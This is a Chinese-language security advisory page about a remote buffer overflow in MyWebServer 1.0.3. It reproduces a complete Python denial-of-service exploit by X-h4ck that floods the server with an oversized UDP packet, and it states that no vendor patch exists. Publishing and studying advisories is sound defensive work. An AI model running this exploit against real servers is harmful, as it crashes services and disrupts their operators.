发布日期：2011-07-28
更新日期：2011-07-28

受影响系统：

MyWebServer MyWebServer 1.0.3

描述：

---

BUGTRAQ  ID: 48920

MyWebServer是一款小型的WEB服务程序。

MyWebServer在实现上存在远程缓冲区溢出漏洞，远程攻击者可利用此漏洞执行任意代码，造成拒绝服务。

<*来源：X-h4ck
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# #########################################################################
#~ Title         : MyWebServer v1.0.3 Denial Of Service  
#~ Software      : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/MyWebServer.shtml
#~ Tested on     : Windows 7 (home premium) / Windows XP SP2 EN
#~ Date          : 27/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email         : mem001@live.com
#~ Greetz        : Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon - mywisdom
# #########################################################################
#Attention : It will crash on google chrome!

#!/usr/bin/python
print " MyWebServer v1.0.3 Denial Of Service"
print " PirateAL@ // Aint no pussy made where we came from \\ "
print " "

import socket

host = '127.0.0.1' #IP
port = 80 #PORT

buff = "\x41" * 25000
aww = "A"
exp = "\x00\x01" + buff + "\0" + aww + "\0"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    print "Connecting..."
    print "w8..."
    sock.sendto(exp, (host, port))
    print sock.recv(1024)
    sock.close()
except:
    print "hmmm, done"

建议：

---

厂商补丁：

MyWebServer
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mywebserver.org

浏览次数：2305
严重程度：0（网友投票）